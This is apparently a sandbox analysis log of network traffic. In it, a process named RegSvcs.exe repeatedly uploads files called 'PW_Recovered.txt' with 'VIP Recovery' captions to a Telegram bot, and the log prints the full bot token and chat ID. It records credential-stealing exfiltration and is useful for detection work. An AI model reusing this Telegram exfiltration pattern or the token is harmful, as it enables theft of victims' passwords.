                                                                          2024-09-19 10:22:20 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12757,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.2.561547149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:21 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdaf9aed13a59
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:21 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 61 66 39 61 65 64 31 33 61 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcdaf9aed13a59Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:21 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:21 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:21 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12758,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.561550149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:24 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdab98bdf9072
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:24 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 61 62 39 38 62 64 66 39 30 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcdab98bdf9072Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:25 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:24 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:25 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12759,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.561551149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:25 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdb6b0f853274
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:25 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 36 62 30 66 38 35 33 32 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcdb6b0f853274Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:25 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:25 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:25 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12760,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.2.561554149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:29 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdb0945efe091
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:29 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 30 39 34 35 65 66 65 30 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcdb0945efe091Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:29 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:29 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:29 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12761,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.2.561555149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:29 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdbdd55c06625
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:29 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 64 64 35 35 63 30 36 36 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcdbdd55c06625Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:29 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:29 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:29 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12762,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.2.561558149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:34 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdc508e6a9ef6
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:34 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 63 35 30 38 65 36 61 39 65 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcdc508e6a9ef6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:34 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:34 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:34 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12763,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.2.561559149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:34 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdb737b693935
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:34 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 37 33 37 62 36 39 33 39 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcdb737b693935Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:34 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:34 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
